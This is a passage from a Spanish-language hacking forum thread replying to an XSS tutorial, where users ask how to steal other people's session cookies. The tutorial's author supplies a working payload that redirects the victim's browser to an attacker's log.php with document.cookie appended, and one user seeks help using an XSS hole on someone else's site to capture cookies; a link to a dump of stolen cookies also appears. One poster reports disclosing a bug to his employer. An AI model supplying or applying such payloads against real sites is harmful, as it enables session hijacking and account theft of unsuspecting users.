 Encuesta
|
| Pregunta: |
Que te pareció este manual?
Malisimo  |
| Malo |
| No aprendí nada |
| Bueno |
Buenisimo  |
|
|
|
Páginas: 1 [2] 
|
 |
|
 Autor
|
Tema: Los Poderes Secretos de XSS (Cross Site Scripting) (Leído 14938 veces)
|
deceiver
 Desconectado
Mensajes: 7
|
Era eso muchas gracias.. una ultima cosa las cookies son algo raras usan KIDYMD=* e visto muchos blogs busandolo pero no veo nada en md5 y no encuentro nada de info sobre esto ¿sabes que es esto? gracias solo encontre blogs y cosas asi con KIDYMD= y demas.. y buscando encontre esto http://users.cjb.net/ebaumcookies/noip.txt ^^ cookies de ebaum o algo asi en las mayorias esta el KIDYMD pero suele estar la pw en md5 y en la mia no :% Espero tu respuesta un saludo |
|
|
|
« Última modificación: 21 Marzo 2006, 01:30 por deceiver »
|
En línea
|
|
|
|
|
sirdarckcat
|
En eso ya no te pudo ayudar xD, te toca a ti, ver que hace.. mucha suerte!!
|
|
|
|
|
En línea
|
|
|
|
|
|
xDie
Desconectado
Mensajes: 300
|
Todavia no entendido muy bien, ya tengo mi log.php y un log2.htm. si yo quiero la cookie de alguien le mando que entre a www.misitio.com/log.php ???? o que debo hacer?? y que cookie me guarda??? Gracias!!!  |
|
|
|
|
En línea
|
|
|
|
|
sirdarckcat
|
no.. lee el manual otra ves  debes encontrar un bug de XSS en la web, y colocar un codigo masomenos asi: self.location.href='http://misitio.com/log.php?c='+escape(document.cookie);
eso debe mandarte la cookie.. del sitio afectado. saludos!! |
|
|
|
|
En línea
|
|
|
|
xDie
Desconectado
Mensajes: 300
|
Ya entendi, justo lei otro manual y me quedo claro.. ahora pregunto en un a web en asp es metodo get es lo mimso no?Gracias
|
|
|
|
|
En línea
|
|
|
|
|
sirdarckcat
|
GET es lo que recibes por la barra de direcciones.. mira, pon esto en la barra de direcciones:
javascript:alert(document.location.search):
esa es la info en metodo GET, en metodo POST, se manda con las cabeceras, por lo que no la puedes ver a menos que uses un proxy.
Saludos!!
|
|
|
|
|
En línea
|
|
|
|
|
|
aurican
Desconectado
Mensajes: 155
|
sigh no encuentro ningun sitio vulnerable en javascript.
|
|
|
|
|
En línea
|
|
|
|
|Azrack|
Desconectado
Mensajes: 85
Enjoy The Silence
|
esta chido el manual tio gracias
|
|
|
|
« Última modificación: 06 Diciembre 2006, 00:04 por |Firewall| »
|
En línea
|
Hay gente tan Ignorante que cree en dios.  Status MSN:>>  << |
|
|
samalo
Desconectado
Mensajes: 6
|
Hola Sirdarckcat, perdón por remover el tema pero aún no me ha quedado claro del todo... y he leído bien la guía... La cosa está en que encontré la vulnerabilidad XSS en el archivo phpinfo.php de esa página... entonces para probar me creé una cuenta y demás y al acceder a ese archivo normalmente con mi cuenta logueada me encuentro que abajo del todo muestra la cookie... el problema es que no sé hacer bien la redirección a mi log.php para que me guarde la cookie de la página... he probado de muchas maneras pero nada, no hay forma... necesito saber que colocar detrás de: www.xxx.com/phpinfo.phppara que funcione el asunto... Gracias desde ya. Un saludo |
|
|
|
|
En línea
|
|
|
|
Lionheart12
Desconectado
Mensajes: 79
|
El manual me parecio bueno. No tengo bien en claro como aplicar los XSS.
|
|
|
|
|
En línea
|
|
|
|
R41N-W4R3
Desconectado
Mensajes: 222
|
Se que este tema esta cerrado.... pero tras leer el manual de XSS y felicitar a su creador, no solo por un buen manual, sino pq se ve que realmente tiene muuchos conociemientos al respecto. Solo me queda añadir que me gustaria que fuese mas practico, calro..si..ya entiendo.... no puede ni podrá serlo......
En definitiva te abre el apetito con este tema tan interesante y supongo que me tendré que pasar muuuchas horas leyendo muchas cosas para sacar realmente jugo a este tutorial. Pero CUANDO NO ES ASI??? jajaja no puede ser de otro modo para aprender... aunke la impaciencia me pueda.
Feliciataciones nuevamente
|
|
|
|
|
En línea
|
|
|
|
|
yeikos
|
|
|
|
|
« Última modificación: 27 Junio 2007, 17:53 por YeIk0s »
|
En línea
|
|
|
|
R41N-W4R3
Desconectado
Mensajes: 222
|
Gracias a vosotros e descubierto una vulnerabilidad de XSS en la web de la empresa en la que trabajo. Por supuesto fue puesto en su conociemiento en arreglado en cuestion de minutos.
Menos mal que he podido averiguarlo aprendiendo de vuestros tutoriales. Aunke la empresa contratada para hacer la pagina web le molesto un poco el asunto, no les quedo otra que reconocerlo.... sobre todo despues de enviarles la captura de pantalla jajajajjaja.
De nuevo gracias y seguid asi.... especialmente yeikos y sidkart.... os debo una cerveza a cada uno.
|
|
|
|
|
En línea
|
|
|
|
|
Páginas: 1 [2] 
|
|
|
 |
